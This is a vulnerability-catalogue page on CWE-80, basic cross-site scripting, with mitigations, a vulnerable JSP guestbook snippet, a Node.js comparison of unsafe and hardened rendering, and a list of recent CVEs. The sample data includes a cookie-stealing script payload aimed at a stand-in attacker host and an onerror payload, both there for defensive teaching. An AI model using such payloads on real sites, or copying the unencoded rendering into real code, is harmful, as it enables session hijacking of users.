CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS), a vulnerability class with 403 entries

403 vulnerabilities classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)). AI-generated Chinese-language analysis is included.

CWE-80 is an output-neutralization weakness: the application writes user-controlled data into a web page without encoding the characters the browser interprets as markup, so an attacker can inject HTML and, through it, script (usually JavaScript) that runs in other users' browsers. The data may arrive with the request (reflected XSS, typically via a crafted URL or form submission) or be stored and served later to every viewer (stored XSS, as in the guestbook example below). Because the injected script runs in the origin and session of the victim, the consequences include session hijacking, credential theft, actions performed as the victim, and defacement. The primary fix is output encoding chosen for the context the data lands in: for HTML body and attribute content, characters such as "<", ">", "&" and quotes are converted to their entity equivalents. Content Security Policy headers and templating frameworks that escape by default limit the damage of a missed encoding, but they are defense in depth, not a substitute for it.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability
Impact: Read Application Data; Execute Unauthorized Code or Commands
Note: An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
Phase: Implementation. Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
Phase: Implementation. Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
Phase: Implementation. With Struts, write all data from form beans with the bean's filter attribute set to true.
Phase: Implementation. To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.
<%@ page import="java.util.Iterator" %>
<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {
       Entry e = (Entry) i.next(); %>
    <p>Entry #<%= e.getId() %></p>
    <%-- e.getText() is attacker-controlled and is written raw, with no HTML encoding --%>
    <p><%= e.getText() %></p>
<% } %>
Bad · JSP
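The following is an added example and is not code from the CWE entry or from any product listed on this page. It re-expresses the JSP guestbook loop above in Node.js and puts the unsafe renderer beside a hardened one that applies the output encoding described in the overview, adds the allowlist check on a request parameter called for by the first mitigation, and includes a blocklist filter that removes only <script> tags to show why that kind of filtering leaves the weakness in place. The entry ids, comment texts and the attacker.invalid host are constructed sample data.

```javascript
// Added example, not code from the CWE entry or from any product listed on
// this page. The guestbook loop from the JSP snippet is re-expressed in
// Node.js with an unsafe and a hardened renderer side by side, an allowlist
// check for a request parameter, and a blocklist filter that shows why
// "strip <script>" is not a fix. Entry ids and texts below are constructed.

// Entity-encode the five characters that carry meaning in the HTML text and
// double-quoted attribute contexts. This is output encoding for those two
// contexts only; URLs and inline JavaScript need their own encoders.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allowlist validation of an input parameter: accept only the format the
// parameter is supposed to have, here a decimal guestbook entry id.
function isValidEntryId(param) {
  return /^[0-9]{1,10}$/.test(String(param));
}

// Unsafe: mirrors the JSP page, which writes e.getText() straight into the body.
function renderGuestbookUnsafe(entries) {
  return entries
    .map((e) => `<p>Entry #${e.id}</p>\n<p>${e.text}</p>`)
    .join('\n');
}

// Hardened: every untrusted value is encoded for the HTML text context it lands in.
function renderGuestbookSafe(entries) {
  return entries
    .map((e) => `<p>Entry #${escapeHtml(e.id)}</p>\n<p>${escapeHtml(e.text)}</p>`)
    .join('\n');
}

// A blocklist filter of the kind that leads to continuing XSS vulnerabilities:
// it removes <script> tags and nothing else.
function stripScriptTags(value) {
  return String(value).replace(/<\/?script[^>]*>/gi, '');
}

// Does the markup still contain a tag that can run script? Matches a <script>
// tag or an on* event-handler attribute inside any tag. Illustrative only.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed sample input: a benign comment with an ampersand, a classic
// <script> payload and an event-handler payload with no <script> tag at all.
const SAMPLE_ENTRIES = [
  { id: 1, text: 'Nice site & thanks!' },
  { id: 2, text: '<script>location="https://attacker.invalid/?c="+document.cookie</script>' },
  { id: 3, text: '<img src=x onerror="alert(document.domain)">' },
];

function demo() {
  const unsafe = renderGuestbookUnsafe(SAMPLE_ENTRIES);
  const filtered = renderGuestbookUnsafe(
    SAMPLE_ENTRIES.map((e) => ({ ...e, text: stripScriptTags(e.text) })),
  );
  const safe = renderGuestbookSafe(SAMPLE_ENTRIES);
  return {
    unsafeHasScript: containsActiveContent(unsafe),     // true
    filteredHasScript: containsActiveContent(filtered), // true: the onerror payload survives
    safeHasScript: containsActiveContent(safe),         // false: no raw '<' reaches the page
    safe,
  };
}

console.log(demo());
```

The encoder here covers the HTML text and quoted-attribute contexts only; a value placed inside a URL, a style block or an inline script needs the encoder for that context, which is why template engines that escape by default are preferred over hand-written calls. The second mitigation on this page also applies to the hardened renderer: send the page with an explicit charset (for example Content-Type: text/html; charset=utf-8) so the browser cannot pick a different encoding and reinterpret the bytes.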
CVE ID | Title | Product | CVSS | Severity | Published
(AI) marks a score or severity the site attributes to its AI analysis; "-" means no severity was given.
CVE-2021-47948 | WordPress GetPaid Plugin 2.4.6 HTML Injection via Help Text | Payments Plugin GetPaid | 5.4 | Medium | 2026-05-10
CVE-2026-42030 | MapServer: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in OpenLayers viewer | MapServer | 6.1 | Medium | 2026-05-08
CVE-2026-44264 | Weblate is vulnerable to XSS via crafted Markdown | weblate | 4.3 | Medium | 2026-05-07
CVE-2026-6002 | HTML Injection in DivvyDrive Information Technologies' DivvyDrive | DivvyDrive | 8.8 | High | 2026-05-07
CVE-2025-59854 | HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability | DFXAnalytics | 3.1 | Low | 2026-05-06
CVE-2026-1564 | Pega Platform versions 8.1.0 through 25.1.1 are affected by an HTML Injection vulnerability in a user interface component. Requires a high privileged user with a developer role. | Pega Infinity | 5.5 | - | 2026-04-15
CVE-2026-20170 | Cisco Webex Contact Center security vulnerability | Cisco Webex Contact Center | 6.1 | Medium | 2026-04-15
CVE-2026-40105 | XWiki has Reflected Cross-Site Scripting (XSS) in its page history compare functionality | xwiki-platform | 8.8 | - | 2026-04-15
CVE-2026-39425 | MaxKB: Stored XSS via Unsanitized html_rander Tags in Markdown Rendering | MaxKB | 5.4 | - | 2026-04-14
CVE-2026-33657 | EspoCRM: Stored HTML injection in email notifications about stream notes via unescaped post field | espocrm | 4.6 | Medium | 2026-04-13
CVE-2026-34718 | Zammad improperly neutralizes script-related HTML tags in ticket articles | zammad | 5.4 (AI) | Medium (AI) | 2026-04-08
CVE-2026-39712 | WordPress tagDiv Composer plugin <= 5.4.3 - Arbitrary Shortcode Execution vulnerability | tagDiv Composer | 5.3 | Medium | 2026-04-08
CVE-2026-39628 | WordPress DukaMarket theme <= 1.3.0 - Arbitrary Shortcode Execution vulnerability | DukaMarket | 5.3 | Medium | 2026-04-08
CVE-2026-39629 | WordPress Uminex theme <= 1.0.9 - Arbitrary Shortcode Execution vulnerability | Uminex | 5.3 | Medium | 2026-04-08
CVE-2026-39626 | WordPress Armania theme <= 1.4.8 - Arbitrary Shortcode Execution vulnerability | Armania | 5.3 | Medium | 2026-04-08
CVE-2026-39625 | WordPress TechOne theme <= 3.0.3 - Arbitrary Shortcode Execution vulnerability | TechOne | 5.3 | Medium | 2026-04-08
CVE-2026-39837 | Stored XSS through the dynamic table format in Cargo | Mediawiki - Cargo Extension | 6.1 (AI) | Medium (AI) | 2026-04-07
CVE-2026-39841 | Stored XSS through list fields on Cargo's page values and Special:CargoTables | Mediawiki - Cargo Extension | 6.1 (AI) | Medium (AI) | 2026-04-07
CVE-2026-39839 | Stored XSS through URLs in Cargo's map format | Mediawiki - Cargo Extension | 6.1 (AI) | Medium (AI) | 2026-04-07
CVE-2026-39344 | Reflected XSS in the login page through the 'username' parameter | CRM | 6.1 (AI) | Medium (AI) | 2026-04-07
CVE-2026-35460 | Papra has an HTML Injection in Transactional Emails via Unescaped User Display Name | papra | 4.3 | Medium | 2026-04-07
CVE-2025-66486 | Multiple vulnerabilities have been addressed in IBM Aspera Shares | Aspera Shares | 4.8 | Medium | 2026-04-01
CVE-2026-1834 | Ibtana - WordPress Website Builder <= 1.2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode | Ibtana – WordPress Website Builder | 6.4 | Medium | 2026-03-31
CVE-2026-2995 | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in GitLab | GitLab | 7.7 | High | 2026-03-25
CVE-2026-32891 | Anchorr Privilege Escalation: Jellyseerr User to Anchorr Admin via Stored XSS | Anchorr | 9.1 | Critical | 2026-03-20
CVE-2026-32753 | FreeScout: Stored XSS through SVG file upload with filter bypass | freescout | 6.1 | - | 2026-03-19
CVE-2026-27166 | Discourse vulnerable to HTML injection via prohibited iframe URLs | discourse | 4.1 | Medium | 2026-03-19
CVE-2026-32732 | XSS in @leanprover/unicode-input-component | vscode-lean4 | 6.1 (AI) | Medium (AI) | 2026-03-13
CVE-2025-59540 | Chamilo: Stored Cross-Site Scripting (XSS) in Chamilo LMS Exercise Feedback | chamilo-lms | 4.8 | - | 2026-03-06
CVE-2026-20070 | Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Services Cross-Site Scripting Vulnerability | Cisco Secure Firewall Adaptive Security Appliance (ASA) Software | 6.1 | Medium | 2026-03-04

Vulnerabilities classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)) account for 403 CVEs. The CWE taxonomy describes the weakness; review the individual CVEs for product-specific impact.